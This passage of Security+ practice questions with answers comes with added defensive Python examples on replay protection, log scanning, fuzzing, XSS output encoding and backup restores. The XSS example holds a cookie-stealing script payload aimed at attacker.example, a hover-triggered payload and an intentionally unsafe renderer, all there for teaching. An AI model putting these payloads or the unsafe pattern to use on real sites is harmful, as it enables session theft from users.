The most likely source (of the given answers) is a fileless virus embedded in a vCard, also known as a Virtual Contact File (VCF). People regularly share contact information at trade shows with vCards, but they can sometimes include malicious code.

The scenario doesn’t mention USB drives.
Malicious traffic from a botnet comes from the Internet, but administrators didn’t detect any malicious traffic from the Internet.
Speakers use presentation media (such as PowerPoint presentations) while speaking, but viewing presentation media won’t infect systems. See Chapter 6.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 136). YCDA, LLC. Kindle Edition.

39
Q

Homer received an email letting him know he won the lottery. To claim the prize, he needs to confirm his identity by providing his name, phone number, address, and birth date. The email states he’ll receive the prize after providing this information. What does this describe?

Spear Phishing
Phishing
Smishing
Whaling

A

Phishing

Explanation:
This describes a phishing email that is trying to trick the user into revealing personal information.

Spear phishing targets a group of people with a common connection, such as employees of a company.
Smishing is a form of phishing that uses text messages.
Whaling is a form of spear phishing that targets high-level executives in an organization. See Chapter 6.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 136). YCDA, LLC. Kindle Edition.

40
Q

** Some Protocols include sequence numbers and timestamps. Which of the following attacks are thwarted by using these components?

MAC Flooding
Replay
SYN Flood
Salting

A

Replay

Explanation:
Timestamps and sequence numbers act as countermeasures against replay attacks. None of the other choices are attacks that timestamps and sequence numbers can thwart.

A media access control (MAC) flood attack attempts to overload a switch with different MAC addresses.
SYN (synchronize) flood attacks disrupt the TCP three-way handshake.
Salting isn’t an attack, but it does protect hashed passwords against rainbow table and other precomputed attacks. See Chapter 7.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 136-137). YCDA, LLC. Kindle Edition.
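
As an added example (not from the study guide), the following Python script shows how a receiver uses both components to reject replayed messages: the sender attaches a sequence number and a timestamp to each message and covers them with an HMAC, and the receiver drops anything with a bad tag, a stale timestamp, or a sequence number it has already accepted. The shared key, the 30-second clock skew window and the fixed clock value are constructed for the demonstration.

```python
import hmac
import hashlib
import json
import time

# Constructed shared secret for the example; a real deployment would derive it
# from a key exchange or configuration, never hard-code it.
SHARED_KEY = b"example-shared-key-not-for-production"


def build_message(seq, payload, key=SHARED_KEY, now=None):
    """Sender side: attach a sequence number and timestamp, then MAC everything.

    The MAC binds seq and ts to the payload, so an attacker cannot simply
    bump the counter on a captured message and resend it.
    """
    ts = int(time.time()) if now is None else now
    body = {"seq": seq, "ts": ts, "payload": payload}
    encoded = json.dumps(body, sort_keys=True).encode()
    tag = hmac.new(key, encoded, hashlib.sha256).hexdigest()
    return {"body": body, "tag": tag}


class Receiver:
    """Receiver side: accepts a message only if its MAC is valid, its
    timestamp is fresh and its sequence number has not been seen before."""

    def __init__(self, key=SHARED_KEY, max_skew=30):
        self.key = key
        self.max_skew = max_skew      # seconds of clock drift tolerated (assumed)
        self.highest_seq = -1         # last accepted sequence number

    def accept(self, msg, now=None):
        now = int(time.time()) if now is None else now
        body = msg["body"]
        encoded = json.dumps(body, sort_keys=True).encode()
        expected = hmac.new(self.key, encoded, hashlib.sha256).hexdigest()
        # Check integrity first: tampered seq/ts values would otherwise pass
        # the freshness tests. compare_digest avoids a timing side channel.
        if not hmac.compare_digest(expected, msg["tag"]):
            return "rejected: bad MAC"
        if abs(now - body["ts"]) > self.max_skew:
            return "rejected: stale timestamp"
        if body["seq"] <= self.highest_seq:
            return "rejected: replayed sequence number"
        self.highest_seq = body["seq"]
        return "accepted"


def demo():
    """Walk through a legitimate exchange, an immediate replay, a delayed
    replay and a message whose sequence number was edited without the key."""
    t0 = 1_700_000_000                       # fixed clock for a repeatable run
    rx = Receiver()
    m1 = build_message(1, {"action": "transfer", "amount": 100}, now=t0)
    m2 = build_message(2, {"action": "transfer", "amount": 50}, now=t0 + 1)
    results = [
        rx.accept(m1, now=t0),               # fresh, seq 1: accepted
        rx.accept(m2, now=t0 + 1),           # fresh, seq 2: accepted
        rx.accept(m1, now=t0 + 2),           # seq 1 resent: replay rejected
        rx.accept(m2, now=t0 + 600),         # captured, replayed ten minutes later
    ]
    forged = {"body": dict(m2["body"], seq=99), "tag": m2["tag"]}
    results.append(rx.accept(forged, now=t0 + 2))   # MAC no longer matches
    return results


if __name__ == "__main__":
    for r in demo():
        print(r)
```

Checking the MAC before the freshness fields matters: without it an attacker could rewrite the sequence number or timestamp of a captured message and slip it past the replay checks, which is what the final forged message in demo() exercises.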

41
Q

You are reviewing the logs for a Web Server and see several suspicious entries. You suspect that an attacker is attempting to write more data into a Web Application’s memory than it can handle. What does this describe?

Pointer/Object Dereference
Race Condition Exploit
DLL Injection Attack
Buffer Overflow Attack

A

Buffer Overflow Attack

Explanation:
A buffer overflow attack attempts to write more data into an application’s memory than it can handle.

A pointer or object dereference flaw (for example, a null pointer dereference) is a programming error that can crash the application or corrupt memory; an attacker may trigger it, but it is a programmer’s mistake rather than an attempt to write more data than a buffer can hold.
A race condition is a programming conflict that occurs when two or more applications or application modules attempt to access or modify a resource at the same time.
A Dynamic Link Library (DLL) injection attack injects a DLL into memory and causes it to run. See Chapter 7.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 137). YCDA, LLC. Kindle Edition.
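
The log review in this scenario can be partly automated. The following Python script is an added example (not from the study guide) that parses combined-format web server log lines, constructed here for the demonstration, and flags request parameters that look like overflow attempts: values far longer than any legitimate input, long runs of a single byte (padding or NOP-sled style payloads), and a 5xx response following such a request. The 256-byte parameter limit and the 64-byte run threshold are assumed starting points to tune per application.

```python
import re
from urllib.parse import unquote, unquote_to_bytes

# Constructed combined-format access log lines. The last two mimic an overflow
# probe: one oversized parameter and one long run of a single byte (0x90).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2023:13:55:36 +0000] "GET /products?id=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Mar/2023:13:55:40 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Mar/2023:13:56:02 +0000] "GET /search?q=' + "A" * 600 + ' HTTP/1.1" 500 0 "-" "python-requests/2.28"',
    '198.51.100.9 - - [10/Mar/2023:13:56:05 +0000] "GET /search?q=' + "%90" * 200 + ' HTTP/1.1" 500 0 "-" "python-requests/2.28"',
]

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
RUN_RE = re.compile(rb"(.)\1{63,}", re.S)   # 64 or more copies of one byte

MAX_PARAM = 256   # assumed ceiling for a legitimate parameter; tune per app


def parse_line(line):
    """Split one log line into ip, timestamp, method, path, status and the
    query parameters (values kept as raw bytes so that %90 stays 0x90)."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    entry = m.groupdict()
    path, _, query = entry["target"].partition("?")
    params = {}
    for pair in query.split("&") if query else []:
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote_to_bytes(value)
    entry["path"] = path
    entry["params"] = params
    return entry


def assess(entry, max_param=MAX_PARAM):
    """Heuristics for overflow-style input on a single parsed entry."""
    findings = []
    for name, value in entry["params"].items():
        if len(value) > max_param:
            findings.append(f"oversized parameter {name!r} ({len(value)} bytes)")
        if RUN_RE.search(value):
            findings.append(f"long run of one byte in {name!r}")
    # A 5xx right after suspicious input suggests the request reached and
    # upset the application rather than being rejected at the edge.
    if findings and entry["status"].startswith("5"):
        findings.append("server error returned: possible crash")
    return findings


def scan(lines, max_param=MAX_PARAM):
    """Return (ip, path, findings) for every line that tripped a heuristic."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        findings = assess(entry, max_param)
        if findings:
            hits.append((entry["ip"], entry["path"], findings))
    return hits


if __name__ == "__main__":
    for ip, path, findings in scan(SAMPLE_LOG):
        print(ip, path, "; ".join(findings))
```

These are triage heuristics, not proof of exploitation: a hit tells you which source and endpoint to look at, and whether the application returned an error, so the next step is correlating with application crash logs for that endpoint.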

42
Q

** Your organization hosts a Web App selling digital products. Customers can also post comments related to their purchases. Management suspects that attackers are looking for vulnerabilities that they can exploit. Which of the following will BEST test the Cybersecurity resilience of this application?

Fuzzing
Input Validation
Error Handling
Anti-malware

A

Fuzzing

Explanation:
Fuzzing is a type of dynamic code analysis, and it can test the application’s cybersecurity resilience. Fuzzing sends random data to an application to verify the random data doesn’t crash the application or expose the system to a data breach.

Input validation and error-handling techniques protect applications but do not test them.
Anti-malware protects systems from malware attacks, but it doesn’t test a system. See Chapter 7.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 137). YCDA, LLC. Kindle Edition.
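
As an added example (not from the study guide), the following Python code is a small mutation-based fuzzer run against a constructed comment parser for the product-review form described above. The fragile parser crashes with IndexError on structurally malformed input, the fuzzer finds those inputs by flipping, deleting, inserting and duplicating bytes of a valid seed, and a hardened version of the same parser shows what a clean result looks like. The message format and both parsers are invented for the example.

```python
import random


def parse_comment(data: bytes):
    """Constructed target: a deliberately fragile parser for submissions of
    the form b'rating:<n>;text:<comment>'. It rejects bad ratings cleanly
    (ValueError) but crashes with IndexError on structurally malformed input,
    which is exactly the kind of bug fuzzing is meant to surface."""
    fields = data.split(b";")
    rating = int(fields[0].split(b":")[1])       # IndexError if no ':'
    if not 1 <= rating <= 5:
        raise ValueError("rating out of range")
    text = fields[1].split(b":", 1)[1]           # IndexError if no ';' or ':'
    # UnicodeDecodeError is a ValueError subclass, so it counts as a clean reject.
    return rating, text.decode("utf-8")


def parse_comment_hardened(data: bytes):
    """Same format, but every malformed input returns None instead of raising."""
    fields = data.split(b";", 1)
    if len(fields) != 2:
        return None
    rating_kv = fields[0].split(b":", 1)
    text_kv = fields[1].split(b":", 1)
    if len(rating_kv) != 2 or len(text_kv) != 2:
        return None
    if rating_kv[0] != b"rating" or text_kv[0] != b"text":
        return None
    try:
        rating = int(rating_kv[1])
    except ValueError:
        return None
    if not 1 <= rating <= 5:
        return None
    return rating, text_kv[1].decode("utf-8", errors="replace")


def mutate(data: bytes, rng: random.Random) -> bytes:
    """Apply one random mutation: flip a byte, delete a byte, insert a byte,
    or append a duplicated prefix."""
    b = bytearray(data)
    choice = rng.randrange(4)
    if choice == 0 and b:
        b[rng.randrange(len(b))] = rng.randrange(256)
    elif choice == 1 and b:
        del b[rng.randrange(len(b))]
    elif choice == 2:
        b.insert(rng.randrange(len(b) + 1), rng.randrange(256))
    else:
        b.extend(b[: rng.randrange(len(b) + 1)])
    return bytes(b)


def fuzz(target, seed_input=b"rating:5;text:great product", iterations=500, seed=1):
    """Mutation-based fuzzer. Returns (input, exception_name) pairs for inputs
    that made the target raise anything other than ValueError, which is the
    parser's documented rejection path. The seed makes runs repeatable."""
    rng = random.Random(seed)
    crashes = []
    for _ in range(iterations):
        data = seed_input
        for _ in range(rng.randint(1, 3)):      # stack one to three mutations
            data = mutate(data, rng)
        try:
            target(data)
        except ValueError:
            continue                             # expected, clean rejection
        except Exception as exc:                 # anything else is a bug
            crashes.append((data, type(exc).__name__))
    return crashes


if __name__ == "__main__":
    found = fuzz(parse_comment)
    print(f"fragile parser: {len(found)} crashing inputs, e.g. {found[0] if found else None}")
    print(f"hardened parser: {len(fuzz(parse_comment_hardened))} crashing inputs")
```

The distinction the fuzzer draws between ValueError and everything else is the important design choice: a parser is allowed to reject input, but any other exception escaping it is a finding to fix, and the hardened parser is written so that no input reaches one.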

43
Q

An attacker has launched several successful XSS attacks on a Web App hosted by your organization. Which of the following are the BEST choices to protect the Web App and prevent this attack? (Choose TWO)

Dynamic Code Analysis
Input Validation
Code Obfuscation
WAF
Normalization

A

Input Validation
WAF (Web Application Firewall)

Explanation:
Input validation and a web application firewall (WAF) are the best choices of the available answers. Both protect against cross-site scripting (XSS) attacks. Input validation validates data before using it to help prevent XSS attacks. A WAF acts as an additional firewall that monitors, filters, and/or blocks HTTP traffic to a web server. None of the other answers will directly prevent XSS attacks.

Dynamic code analysis (such as fuzzing) can test code.
Code obfuscation makes the code more difficult to read.
Normalization refers to organizing tables and columns in a database to reduce redundant data and improve overall database performance. See Chapters 3 and 7.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 137). YCDA, LLC. Kindle Edition.

44
Q

Hacker Harry has an account on a Website that he uses when posting comments. When he visits, he enters his username and password to log on, and the site displays his Username with any comments he makes. Today, he noticed that he could enter JavaScript code as part of his Username. After entering the code, other users experienced unexpected results when hovering over his Username. What does this describe?

Cross-Site Scripting
Input Validation
Privilege Escalation
Directory Traversal

A

Cross-Site Scripting

Explanation:
This is an example of a cross-site scripting (XSS) attack.

It can be prevented by using proper input validation to reject unexpected characters in fields such as the username, combined with output encoding so that anything the site echoes back is rendered as text rather than interpreted as script.
Privilege escalation techniques attempt to give an attacker more rights and permissions.
In a directory traversal attack, the attacker can navigate a system’s directory structure and read files. See Chapter 7.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 138). YCDA, LLC. Kindle Edition.
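
As an added example (not from the study guide), the following Python code shows the two controls side by side for Harry’s scenario: an unsafe template that concatenates the username into HTML, the same template with output encoding, and an allow-list username check. The payloads, the allowed username alphabet and the HTML template are constructed for the example; the point is that encoding on output neutralises the payload even if validation is bypassed.

```python
import html
import re

# Assumed policy: a username is 3-32 characters of letters, digits, underscore
# or hyphen. Angle brackets, quotes and parentheses never get past this check.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_-]{3,32}$")


def validate_username(username: str) -> bool:
    """Allow-list input validation: True only for usernames in the safe alphabet."""
    return USERNAME_RE.fullmatch(username) is not None


def render_comment_unsafe(username: str, comment: str) -> str:
    """Vulnerable: user-controlled text is concatenated straight into HTML, so
    a username containing a script tag or an event-handler attribute runs in
    every visitor's browser. Kept only to contrast with the fixed version."""
    return (f'<div class="comment"><span class="user" title="{username}">'
            f"{username}</span>: {comment}</div>")


def render_comment_safe(username: str, comment: str) -> str:
    """Fixed: output encoding turns <, >, &, ' and " into entities before the
    text reaches the page. quote=True also covers the attribute context."""
    u = html.escape(username, quote=True)
    c = html.escape(comment, quote=True)
    return (f'<div class="comment"><span class="user" title="{u}">'
            f"{u}</span>: {c}</div>")


def handle_submission(username: str, comment: str):
    """Defence in depth: validate the username first, then encode on output.
    Returns (accepted, rendered_html_or_reason)."""
    if not validate_username(username):
        return False, "username contains characters outside the allowed set"
    return True, render_comment_safe(username, comment)


# Constructed payloads in the style of the scenario: script in the username,
# and an attribute-breaking payload that fires when another user hovers.
PAYLOAD_SCRIPT = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"
PAYLOAD_HOVER = 'x" onmouseover="alert(1)'

if __name__ == "__main__":
    print(render_comment_unsafe(PAYLOAD_HOVER, "nice shoes"))
    print(render_comment_safe(PAYLOAD_HOVER, "nice shoes"))
    print(handle_submission(PAYLOAD_SCRIPT, "hi"))
    print(handle_submission("hacker_harry", "<b>hi</b>"))
```

The hover payload is the interesting one: it contains no script tag, so a filter that only strips `<script>` would let it through, while encoding the quote character breaks it out of nothing and it is displayed harmlessly as text.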

45
Q

Which of the following BEST describes the purpose of a Risk register?

It shows Risks on a plot or graph.

It provides a listing of Risks, the Risk Owner, and the Mitigation measures.

It shows Risks on a color-coded graph.

It evaluates the Supply Chain

A

It provides a listing of Risks, the Risk Owner, and the Mitigation measures.

Explanation:
A risk register lists risks and often includes the name of the risk, the risk owner, mitigation measures, and a risk score.

A risk matrix plots risks onto a graph or chart, and a heat map plots risks onto a color-coded graph or chart.
While a risk register may evaluate supply chain risks, it does much more. See Chapter 8.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 138). YCDA, LLC. Kindle Edition.

46
Q

Maggie is performing a Risk Assessment for an organization. She identifies the loss for the previous year due to a specific Risk as $5000. What does this represent?

SLE
ARO
MTBF
ALE

A

ALE (Annual Loss Expectancy)

Explanation:
The annual loss expectancy (ALE) identifies the expected loss for a given year based on a specific risk and existing security controls.

The single loss expectancy (SLE) identifies the cost of any single loss.
The annual rate of occurrence (ARO) identifies how many times a loss is expected to occur in a year. Multiplying SLE × ARO identifies the ALE. Note that the scenario refers to a specific risk, but it doesn’t indicate how many times the loss occurred. This could have been five incidents (ARO of 5) incurring losses of $1,000 for each incident (SLE), resulting in an ALE of $5,000.
The mean time between failures (MTBF) provides a measure of a system’s reliability and is usually represented in hours. See Chapter 8.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 138). YCDA, LLC. Kindle Edition.

47
Q

Ziffcorp is developing a new technology that they expect to become a huge success when it’s released. The CIO is concerned about someone stealing their company secrets related to this technology. Which of the following will help CIO identify potential dangers related to the loss of this technology?

Threat Hunting
Vulnerability Scan
SOAR
SIEM

A

Threat Hunting

Explanation:
Threat hunting is the process of actively looking for threats within a network before an automated tool detects and reports on the threat. It typically includes several elements.

A vulnerability scan evaluates vulnerabilities (or weaknesses) with a network or a specific system, but it doesn’t look for threats.
A Security Orchestration, Automation, and Response (SOAR) platform can be configured to automatically respond to low-level incidents, but this scenario indicates that they need to look for more than just low-level threats.
A security information and event management (SIEM) is used to collect and aggregate logs and can assist with threat hunting, but threat hunting is much broader. See Chapter 8.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 138-139). YCDA, LLC. Kindle Edition.

48
Q

Your organization hired a Cybersecurity expert to perform a Security Assessment. After running a Vulnerability Scan, she sees the following error on a Web Server:

Host IP 192.168.1.10 OS Apache httpd 2.433 Vulnerable to mod_auth exploit

However, she verified that the mod_auth module has not been installed or enabled on the server. Which of the following BEST explains this scenario?

False Negative
False Positive
The result of a Credentialed Scan
Result of a Non-Credentialed Scan

A

False Positive

Explanation:
This is an example of a false positive. The vulnerability scanner is indicating a vulnerability exists with the mod_auth module. However, the mod_auth module is not installed or enabled on the server, so it cannot represent a vulnerability on the server.

A false negative occurs when a vulnerability exists, but the scanner doesn’t report it. The scenario doesn’t give enough information to determine if this is a credentialed or a non-credentialed scan.
However, a credentialed scan would allow a vulnerability scanner to have more visibility over the systems it scans, allowing it to get a more accurate view of the systems. See Chapter 8.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 139). YCDA, LLC. Kindle Edition.

49
Q

** You are reviewing a report created after a recent vulnerability scan. However, it isn’t clear if the scan was run as a Credentialed Scan or a Non-Credentialed Scan. Which of the following would give you the BEST indication that the scan was a Credentialed Scan?

The report shows software versions of installed apps.
The report shows a large number of False Positives.
The report shows a listing of IP Addresses it discovered.
The report shows a listing of Open Ports.

A

The report shows software versions of installed apps.

Explanation:
A credentialed scan will show software versions of installed applications.

A credentialed scan will show fewer false positives, not more.
Any scan should list IP addresses it discovered along with open ports on these hosts. See Chapter 8.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 139). YCDA, LLC. Kindle Edition.

50
Q

Your IT department includes a subgroup of employees dedicated to Cybersecurity testing. Each member of this group has knowledge of known TTPs and how to use them. Additionally, each member of this group has knowledge of Security Controls that would be implemented to protect Network resources. Which of the following BEST describes members of this Team?

Members of the Red Team
Members of the Blue Team
Members of the Purple Team
Members of the White Team

A

Members of the Purple Team

Explanation:
A purple team is composed of personnel who can perform as either red team members or blue team members.

A red team attacks and they often use tactics, techniques, and procedures (TTPs) that attackers have used in actual attacks.
A blue team defends, and they would know about various security controls used to protect network resources.
The white team wasn’t mentioned in the scenario; its members don’t perform any testing but instead set the rules of engagement and oversee the exercise. See Chapter 8.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 139). YCDA, LLC. Kindle Edition.

51
Q

You suspect Servers in your screened subnet are being attacked by an Internet-based attacker. You want to view IPv4 packet data reaching these Servers from the Internet. Which of the following would be the BEST choice to meet this need?

Protocol Analyzer
IP Scanner
Vulnerability Scanner
Proxy Server
Heuristic-based IDS

A

Protocol Analyzer

Explanation:
A protocol analyzer can capture and analyze packets on a network.

An IP scanner (sometimes called a network scanner) identifies hosts within a network by identifying active IP addresses and additional information about each active host.
Vulnerability scanners scan hosts within a network looking for vulnerabilities.
Proxy servers (also known as forward proxy servers) forward requests for services from a client.
Heuristic-based (sometimes called behavior-based) intrusion detection systems (IDSs) detect intrusions by identifying anomalies. See Chapter 8.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 140). YCDA, LLC. Kindle Edition.

52
Q

** Your organization has decided to move some data to a Cloud provider, and management has narrowed their search down to three possible choices. Management wants to ensure that the Cloud provider they choose has strong Cybersecurity controls in place. Which of the following reports would they MOST likely want the Cloud provider to give them?

SOC 2 Type I
SOC 2 Type II
SOC 3
SOC 1

A

SOC 2 Type II

Explanation:
A System and Organization Controls (SOC) 2 report is a report on organizational controls that cover cybersecurity. A SOC 2 Type II report identifies the controls in place during a date range of at least six months.

A SOC 2 Type I report identifies the controls in place during a specific date.
A SOC 3 report is a generalized report sometimes available to the public.
A SOC 1 report is a detailed report covering financial and auditable controls for an organization and is sometimes provided by organizations that process financial data. See Chapter 8.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 140). YCDA, LLC. Kindle Edition.

53
Q

** You need to identify and mitigate potential single points of failure in your organization’s Security operations. Which of the following policies would help you?

Disaster Recovery Plan
Business Impact Analysis
Annualized Loss Expectancy
Separation of Duties

A

Separation of Duties

Explanation:
A separation of duties policy is the best answer. In this context, if only one person can perform tasks within the organization’s security operations, that person becomes a single point of failure. None of the other answers address a single point of failure.

A disaster recovery plan (DRP) identifies how to recover critical systems and data after a disaster.
A business impact analysis (BIA) helps an organization identify critical systems and components.
An annualized loss expectancy (ALE) identifies the expected annual loss from a known risk. See Chapter 9.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 140). YCDA, LLC. Kindle Edition.

54
Q

Administrators at your organization want to increase Cybersecurity resilience of key Servers by adding Fault Tolerance capabilities. However, they have a limited budget. Which of the following is the BEST choice to meet these needs?

Alternate Processing Site
RAID-10
Backups
Faraday Cage

A

RAID-10

Explanation:
A redundant array of inexpensive disks 10 (RAID-10) subsystem provides fault tolerance for disks and increases cybersecurity resilience. In this context, cybersecurity resilience refers to a system’s ability to continue to operate even after an adverse event.

An alternate processing site can provide cybersecurity resilience for an entire site, but it is expensive and does much more than provide fault tolerance for some servers.
Backups contribute to cybersecurity resilience, but they do not help with fault tolerance.
A Faraday cage is a room or enclosure that prevents signals from emanating beyond the room. See Chapter 9.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 141). YCDA, LLC. Kindle Edition.

55
Q

Your organization’s backup policy for a file Server dictates that the amount of time needed to restore backups should be minimized. Which of the following backup plans would BEST meet this need?

Full backups on Sunday and incremental backups on the other six days of the week.

Full backups on Sunday and differential backups on the other six days of the week.

Incremental backups on Sunday and differential backups on the other six days of the week.

Differential backups on Sunday and incremental backups on the other six days of the week.

A

Full backups on Sunday and differential backups on the other six days of the week.

Explanation:
A full/differential backup strategy is best with one full backup on one day and differential backups on the other days. A restore would require only two backups, making it quicker than the other options.

A full/incremental backup would typically require you to restore more than two backups. For example, data loss on Friday would require you to restore the full backup, plus four incremental backups.
Backups must start with a full backup, so neither an incremental/differential nor a differential/incremental backup strategy is possible. See Chapter 9.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 141). YCDA, LLC. Kindle Edition.
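
The following Python simulation is an added example (not from the study guide) that generalises the reasoning above to any day of the week: it runs one week of each strategy over a constructed set of daily file changes, works out which backup sets must be applied to recover the state as of a given day, and checks that both chains restore the same files. The change log and the archive-bit bookkeeping are modelled for the example, not taken from any particular backup product.

```python
DAYS = ["Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat"]

# Constructed change log: file -> version written on that day. Sunday's changes
# land before the Sunday full backup is taken.
CHANGES = {
    "Sun": {"a.txt": 1, "b.txt": 1, "c.txt": 1},
    "Mon": {"a.txt": 2},
    "Tue": {"b.txt": 2},
    "Wed": {"a.txt": 3, "d.txt": 1},
    "Thu": {"c.txt": 2},
    "Fri": {"b.txt": 3},
    "Sat": {"d.txt": 2},
}


def run_week(daily_kind):
    """Simulate one week with a full backup on Sunday and `daily_kind`
    ('incremental' or 'differential') on the other six days.

    Returns (backups, snapshots): backups is a list of (day, kind, contents);
    snapshots maps each day to the true file state after that day's changes,
    which is what a restore must reproduce.
    """
    state, since_full, since_last = {}, set(), set()
    backups, snapshots = [], {}
    for day in DAYS:
        for f, v in CHANGES[day].items():
            state[f] = v
            since_full.add(f)       # changed since the last full backup
            since_last.add(f)       # changed since the last backup of any kind
        kind = "full" if day == "Sun" else daily_kind
        if kind == "full":
            contents = dict(state)
            since_full.clear()
            since_last.clear()
        elif kind == "incremental":
            contents = {f: state[f] for f in since_last}
            since_last.clear()      # an incremental resets the archive bit
        elif kind == "differential":
            contents = {f: state[f] for f in since_full}
            # a differential resets nothing, so it grows until the next full
        else:
            raise ValueError(kind)
        backups.append((day, kind, contents))
        snapshots[day] = dict(state)
    return backups, snapshots


def restore_chain(backups, through_day):
    """Ordered list of backup sets needed to rebuild the state as of
    `through_day`'s backup. Data lost during Friday's working day means
    restoring through Thursday's backup."""
    window = backups[: DAYS.index(through_day) + 1]
    last_full = max(i for i, (_, kind, _) in enumerate(window) if kind == "full")
    chain = [window[last_full]]
    chain += [b for b in window[last_full + 1:] if b[1] == "incremental"]
    if window[-1][1] == "differential":
        chain.append(window[-1])    # only the newest differential is needed
    return chain


def restore(chain):
    """Apply the chain in order; later sets overwrite older file versions."""
    state = {}
    for _, _, contents in chain:
        state.update(contents)
    return state


def compare(through_day):
    """Number of backup sets each strategy needs to recover `through_day`,
    after verifying that both chains really reproduce that day's state."""
    out = {}
    for kind in ("incremental", "differential"):
        backups, snapshots = run_week(kind)
        chain = restore_chain(backups, through_day)
        assert restore(chain) == snapshots[through_day]
        out[kind] = len(chain)
    return out


if __name__ == "__main__":
    for day in DAYS:
        print(day, compare(day))
```

The trade-off the table makes visible is the usual one: the differential chain never exceeds two sets, but each differential carries every change since Sunday, so the nightly backup window and storage grow through the week, while incrementals stay small and push the cost onto restore time.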

56
Q

** A Security Analyst recently completed a BIA and defined the maximum acceptable outage time for a critical system. What does this identify?

RTO
RPO
MTTR
MTBF

A

RTO (Recovery Time Objective)

Explanation:
A recovery time objective (RTO) identifies the maximum amount of time it can take to restore a system after an outage. It is directly related to the maximum acceptable outage time defined in a business impact analysis (BIA). None of the other answers are related to the maximum acceptable outage time.

A recovery point objective (RPO) identifies the point in time to which data must be recoverable, so it defines how much data loss (measured in time) is acceptable and therefore how often backups must run; it is commonly applied to databases.
The mean time between failures (MTBF) provides a measure of a system’s reliability and is usually represented in hours.
The mean time to recover (MTTR) identifies the average (the arithmetic mean) time it takes to restore a failed system. See Chapter 9.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 141-142). YCDA, LLC. Kindle Edition.

57
Q

The new Chief Technology Officer (CTO) at your organization wants to ensure that critical business systems are protected from isolated outages. Which of the following would let her know how often these systems will experience outages?

MTTR
MTBF
RTO
RPO

A

MTBF (Mean Time Between Failures)

Explanation:
The mean time between failures (MTBF) provides a measure of a system’s reliability and would provide an estimate of how often the systems will experience outages.

The mean time to recover (MTTR) refers to the time it takes to restore a system, not the time between failures.
The recovery time objective (RTO) identifies the maximum amount of time it can take to restore a system after an outage.
The recovery point objective (RPO) identifies a point in time where data loss is acceptable. See Chapter 9.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 142). YCDA, LLC. Kindle Edition.

58
Q

The Ninth National Bank of Springfield is considering an alternative location as part of its Continuity of Operations Plan. It wants to identify a site resiliency solution that provides the shortest recovery time. Which of the following is the BEST choice?

Cold Site
Warm Site
Hot Site
Snapshot

A

Hot Site

Explanation:
A hot site has the shortest recovery time, but it is also the most expensive.

Cold sites have the longest recovery time and are the least expensive.
Warm sites have a shorter recovery time than cold sites but a longer recovery time than hot sites.
A snapshot backup provides a backup of a disk at a moment in time and is sometimes used in digital forensics. See Chapter 9.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 142). YCDA, LLC. Kindle Edition.

59
Q

Cybersecurity experts in your organization are creating a detailed plan identifying how to recover critical systems if these systems suffer a complete loss. What type of plan are they MOST likely creating?

Backup Plan
Incident Response Plan
Communications Plan
Disaster Recovery Plan

A

Disaster Recovery Plan

Explanation:
A disaster recovery plan (DRP) identifies how to recover critical systems after a disaster.

Backup plans are typically focused on backing up and restoring data, not systems.
An incident response plan is implemented after a security incident, but not all security incidents result in a complete loss of systems.
A communications plan is part of an incident response plan and provides direction on how to communicate issues related to an incident. See Chapter 9.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 142). YCDA, LLC. Kindle Edition.

60
Q

Your organization is planning to expand its Cloud-based services offered to the public. In preparation, they expanded the data center. It currently has one row of racks for Servers, but they plan to add at least one more row of racks for Servers. Engineers calculated the power and HVAC requirements and said the best way to reduce utility costs is by ensuring the two Server rows are facing in opposite directions. What is the primary reason for this configuration?

To provide fire suppression.
To reduce power consumption from the servers.
To create hot and cold aisles.
To create an air gap.

A

To create hot and cold aisles.

Explanation:
Hot and cold aisles have server rows facing the opposite direction and provide more efficient cooling systems within a data center.

This results in reduced costs for the heating, ventilation, and air conditioning (HVAC) system and subsequently reduces power consumption to keep the data center cool. This does not reduce the power consumption of the servers.
Hot and cold aisles do not provide fire suppression.
